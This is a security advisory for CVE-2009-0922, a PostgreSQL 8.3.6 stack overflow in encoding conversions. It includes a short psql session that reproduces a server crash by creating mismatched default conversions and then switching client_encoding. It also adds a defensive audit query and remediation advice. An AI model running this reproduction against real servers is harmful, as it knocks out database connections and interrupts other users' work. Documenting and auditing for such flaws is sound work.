BUGTRAQ ID: 34090
CVE(CAN) ID: CVE-2009-0922
PostgreSQL is an advanced object-relational database management system that supports an extended subset of the SQL standard.
PostgreSQL has a stack overflow vulnerability in its handling of encoding conversions. An authenticated user can submit a specially crafted SQL query to terminate connections to the PostgreSQL server for a period of time, interrupting the transactions of other users and clients.
Affected version: PostgreSQL 8.3.6
Vendor patch:
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:
<a href="http://www.postgresql.org" target="_blank">http://www.postgresql.org</a>
=cut=
postgres@sunset:~$ createdb test -E KOI8
postgres@sunset:~$ psql test
Welcome to psql 8.3.6, the PostgreSQL interactive terminal.
Type:  \copyright for distribution terms
       \h for help with SQL commands
       \? for help with psql commands
       \g or terminate with semicolon to execute query
       \q to quit
test=# SHOW server_version;
 server_version
----------------
 8.3.6
(1 row)
test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM
ascii_to_mic;
CREATE CONVERSION
test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM
mic_to_ascii;
CREATE CONVERSION
test=# set client_encoding to 'LATIN1';
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
Соединение с сервером было потеряно.
Попытка переустановить: Безуспешно.
!> \q
=end cut=
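The session above shows the precondition for the crash: a user-created DEFAULT CONVERSION that binds a builtin conversion function (ascii_to_mic, mic_to_ascii) to an encoding pair it was not written for, which the server then picks up as soon as a client switches client_encoding. The audit query below is an added example, not part of the original advisory or of the PostgreSQL project; it reads only the standard pg_catalog tables (pg_conversion, pg_namespace, pg_roles) and the builtin pg_encoding_to_char() function, and reports every conversion defined outside pg_catalog together with whether its function normally serves that encoding pair. A DBA can run it on any database as part of the patch rollout to find conversions worth dropping before unpatched servers are exposed.

```sql
-- Added audit query (not from the original advisory): confirm the running
-- version, then list every conversion that lives outside pg_catalog. Builtin
-- conversions are all in pg_catalog, so anything else was created with
-- CREATE CONVERSION by a user holding CREATE on that schema.
SHOW server_version;

SELECT n.nspname                             AS schema_name,
       c.conname                             AS conversion_name,
       pg_encoding_to_char(c.conforencoding) AS from_encoding,
       pg_encoding_to_char(c.contoencoding)  AS to_encoding,
       c.conproc::regproc                    AS conversion_function,
       c.condefault                          AS is_default,
       r.rolname                             AS owner,
       CASE
         -- same function, same encoding pair as a builtin conversion:
         -- redundant but harmless
         WHEN EXISTS (SELECT 1
                        FROM pg_catalog.pg_conversion b
                        JOIN pg_catalog.pg_namespace bn ON bn.oid = b.connamespace
                       WHERE bn.nspname = 'pg_catalog'
                         AND b.conproc        = c.conproc
                         AND b.conforencoding = c.conforencoding
                         AND b.contoencoding  = c.contoencoding)
           THEN 'duplicates a builtin conversion'
         -- builtin function bound to a different encoding pair: this is the
         -- pattern used in the reproduction (ascii_to_mic for LATIN1 -> KOI8)
         WHEN EXISTS (SELECT 1
                        FROM pg_catalog.pg_conversion b
                        JOIN pg_catalog.pg_namespace bn ON bn.oid = b.connamespace
                       WHERE bn.nspname = 'pg_catalog'
                         AND b.conproc = c.conproc)
           THEN 'builtin function bound to a non-builtin encoding pair'
         -- user-supplied C function: review the code that implements it
         ELSE 'custom conversion function'
       END                                   AS finding
  FROM pg_catalog.pg_conversion c
  JOIN pg_catalog.pg_namespace n ON n.oid = c.connamespace
  JOIN pg_catalog.pg_roles     r ON r.oid = c.conowner
 WHERE n.nspname <> 'pg_catalog'
 ORDER BY schema_name, conversion_name;
```

Rows whose finding is "builtin function bound to a non-builtin encoding pair" are the ones that match the advisory; on a patched server they are merely rejected, on 8.3.6 they are a standing denial-of-service trigger and should be removed with DROP CONVERSION. Because CREATE CONVERSION requires CREATE privilege on the target schema, revoking CREATE on the public schema from ordinary roles limits who can set the condition up in the first place, while upgrading to the vendor release remains the actual fix.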